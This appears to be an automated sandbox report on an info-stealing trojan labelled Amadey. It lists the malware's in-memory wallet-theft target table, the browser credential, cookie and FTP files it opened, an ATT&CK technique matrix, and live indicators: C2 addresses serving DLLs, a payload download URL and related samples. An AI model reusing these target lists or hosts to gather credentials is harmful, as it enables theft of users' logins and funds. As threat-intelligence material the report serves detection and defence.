                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmp, String found in binary or memory: *exodus*.*
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmp, String found in binary or memory: *ethereum*.*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match, File source: Process Memory Space: cmd.exe PID: 2472, type: MEMORYSTR
                        Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match, File source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 4_2_6C820C40 sqlite3_bind_zeroblob,4_2_6C820C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 4_2_6C820D60 sqlite3_bind_parameter_name,4_2_6C820D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 4_2_6C748EA0 sqlite3_clear_bindings,4_2_6C748EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 4_2_6C820B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,4_2_6C820B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 4_2_6C746410 bind,WSAGetLastError,4_2_6C746410
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 11 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 124 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 511 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        [Behavior graph: ID 1528620; Sample: 7AeSqNv1rC.exe; Startdate: 08/10/2024; Architecture: WINDOWS; Score: 100]

                        Source | Detection | Scanner | Label | Link
                        7AeSqNv1rC.exe | 66% | ReversingLabs | Win32.Trojan.Amadey |
                        7AeSqNv1rC.exe | 31% | Virustotal | | Browse
                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe | 100% | Joe Sandbox ML | |
                        C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                        C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                        C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe | 88% | ReversingLabs | Win32.Trojan.Amadey |
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        steamcommunity.com | 0% | Virustotal | | Browse
                        cowod.hopto.org | 10% | Virustotal | | Browse
                        SourceDetectionScannerLabelLink
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | true |  | unknown
cowod.hopto.org | 45.132.206.251 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
https://49.12.106.214/mozglue.dll | true |  | unknown
https://49.12.106.214/ | true |  | unknown
https://49.12.106.214/nss3.dll | true |  | unknown
https://49.12.106.214/softokn3.dll | true |  | unknown
http://185.215.113.117/inc/clip.exe | false |  | unknown
https://49.12.106.214/freebl3.dll | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                          unknown
                                                          https://steamcommunity.com/market/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalseunknown
                                                          https://store.steampowered.com/news/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://49.12.106.214/mozglue.dllpInstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.tiro.com7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KFHJJD.4.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://store.steampowered.com/subscriber_agreement/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              unknown
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, IIEHJE.4.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.goodfont.co.kr7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enInstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://steamcommunity.com/profiles/76561199780418869/inventory/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                unknown
                                                                https://steamcommunity.com/discussions/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                  unknown
                                                                  http://www.typography.netD7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htm7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://store.steampowered.com/stats/InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.106.214 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
185.215.113.117 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | false
45.132.206.251 | cowod.hopto.org | Russian Federation | 59731 | LIFELINK-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528620
Start date and time: 2024-10-08 04:58:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 7AeSqNv1rC.exe (renamed because original name is a hash value)
Original Sample Name: f275736a38a6b90825076e8d786ad5c5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/22@2/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 94%
                                                                  • Number of executed functions: 121
                                                                  • Number of non-executed functions: 208
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target 7AeSqNv1rC.exe, PID 7300 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:59:05 | API Interceptor | 2x Sleep call for process: 7AeSqNv1rC.exe modified
22:59:43 | API Interceptor | 1x Sleep call for process: InstallUtil.exe modified
23:00:46 | API Interceptor | 46x Sleep call for process: cmd.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  49.12.106.214out.exeGet hashmaliciousVidarBrowse
                                                                    down.exeGet hashmaliciousUnknownBrowse
                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                        • www.valvesoftware.com/legal.htm
                                                                        185.215.113.117nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/CompleteStudio.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                        • 185.215.113.117/dobre/splwow64.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/LummaC222222.exe
                                                                        kGgEIxpC7g.exeGet hashmaliciousMicroClipBrowse
                                                                        • 185.215.113.117/nholman/
                                                                        kGgEIxpC7g.exeGet hashmaliciousDridex Dropper, MicroClipBrowse
                                                                        • 185.215.113.117/nholman/
                                                                        XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                                                        • 185.215.113.117/inc/needmoney.exe
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cowod.hopto.orgVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 45.132.206.251
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        steamcommunity.comVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 23.197.127.21
                                                                        j8zJ5Jwja4.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        SecuriteInfo.com.Win32.Evo-gen.11282.4102.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        HETZNER-ASDESTlUEqhwpx.exeGet hashmaliciousQuasarBrowse
                                                                        • 195.201.57.90
                                                                        https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 46.4.98.169
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 49.12.106.214
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 116.203.9.188
                                                                        BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                                                        • 85.10.195.17
                                                                        UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.251.114.233
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 116.203.9.188
                                                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.40.141.211
                                                                        LIFELINK-ASRUVmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        out.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        down.exeGet hashmaliciousUnknownBrowse
                                                                        • 45.132.206.251
                                                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                        • 45.132.206.251
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 45.132.206.251
                                                                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 185.215.113.37
                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                        • 185.215.113.37
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                Category:dropped
                                                                                                                Size (bytes):28672
                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                Encrypted:false
